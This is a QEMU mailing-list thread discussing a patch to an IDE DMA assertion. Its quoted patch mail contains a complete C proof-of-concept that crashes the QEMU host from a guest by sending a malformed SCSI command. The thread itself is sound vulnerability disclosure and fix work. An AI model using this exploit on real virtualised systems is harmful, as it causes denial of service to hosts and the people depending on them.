On 06.11.2019 15:05, Michael S. Tsirkin wrote: > On Thu, Jul 25, 2019 at 08:25:03PM -0400, John Snow wrote: >> >> >> On 7/5/19 10:07 AM, Alexander Popov wrote: >>> This assertion was introduced in the commit a718978ed58a in July 2015. >>> It implies that the size of successful DMA transfers handled in >>> ide_dma_cb() should be multiple of 512 (the size of a sector). >>> >>> But guest systems can initiate DMA transfers that don't fit this >>> requirement. Let's improve the assertion to prevent qemu DoS from quests. >>> >>> PoC for Linux that uses SCSI_IOCTL_SEND_COMMAND to perform such an ATA >>> command and crash qemu: >>> >>> #include <stdio.h> >>> #include <sys/ioctl.h> >>> #include <stdint.h> >>> #include <sys/types.h> >>> #include <sys/stat.h> >>> #include <fcntl.h> >>> #include <string.h> >>> #include <stdlib.h> >>> #include <scsi/scsi.h> >>> #include <scsi/scsi_ioctl.h> >>> >>> #define CMD_SIZE 2048 >>> >>> struct scsi_ioctl_cmd_6 { >>> unsigned int inlen; >>> unsigned int outlen; >>> unsigned char cmd[6]; >>> unsigned char data[]; >>> }; >>> >>> int main(void) >>> { >>> intptr_t fd = 0; >>> struct scsi_ioctl_cmd_6 *cmd = NULL; >>> >>> cmd = malloc(CMD_SIZE); >>> if (!cmd) { >>> perror("[-] malloc"); >>> return 1; >>> } >>> >>> memset(cmd, 0, CMD_SIZE); >>> cmd->inlen = 1337; >>> cmd->cmd[0] = READ_6; >>> >>> fd = open("/dev/sg0", O_RDONLY); >>> if (fd == -1) { >>> perror("[-] opening sg"); >>> return 1; >>> } >>> >>> printf("[+] sg0 is opened\n"); >>> >>> printf("[.] qemu should break here:\n"); >>> fflush(stdout); >>> ioctl(fd, SCSI_IOCTL_SEND_COMMAND, cmd); >>> printf("[-] qemu didn't break\n"); >>> >>> free(cmd); >>> >>> return 1; >>> } >>> >>> Signed-off-by: Alexander Popov <alex.po...@linux.com> >>> --- >>> hw/ide/core.c | 2 +- >>> 1 file changed, 1 insertion(+), 1 deletion(-) >>> >>> diff --git a/hw/ide/core.c b/hw/ide/core.c >>> index 6afadf8..304fe69 100644 >>> --- a/hw/ide/core.c >>> +++ b/hw/ide/core.c >>> @@ -868,7 +868,7 @@ static void ide_dma_cb(void *opaque, int ret) >>> >>> sector_num = ide_get_sector(s); >>> if (n > 0) { >>> - assert(n * 512 == s->sg.size); >>> + assert(n == s->sg.size / 512); >>> dma_buf_commit(s, s->sg.size); >>> sector_num += n; >>> ide_set_sector(s, sector_num); >>> >> >> Oh, this is fun. >> >> So you're actually requesting 131072 bytes (256 sectors) but you're >> giving it far too short of a PRDT. >> >> But ... the prepare_buf callback got anything at all, so it was happy to >> proceed, but the callback chokes over the idea that the SGlist wasn't >> formatted correctly -- it can't deal with partial tails. >> >> I think it might be the case that the sglist needs to be allowed to have >> an unaligned tail, and then the second trip to the dma_cb when there >> isn't any more regions in the PRDT to add to the SGList to transfer at >> least a single sector -- but the IDE state machine still has sectors to >> transfer -- we need to trigger the short PRD clause. >> >> Papering over it by truncating the tail I think isn't sufficient; there >> are other problems this exposes. >> >> As an emergency patch, it might be better to just do this whenever we >> see partial tails: >> >> prepared = ...prepare_buf(s->bus->dma, s->io_buffer_size); >> if (prepared % 512) { >> ide_dma_error(s); >> return; >> } > > Do you want to cook up a patch like this then?
Yes, I will take this task and return with a patch. Thanks! Best regards, Alexander >> I think that prepare_buf does not give unaligned results if you provided >> *too many* bytes, so the unaligned return only happens when you starve it. >> >> I can worry about a proper fix for 4.2+. >> >> --js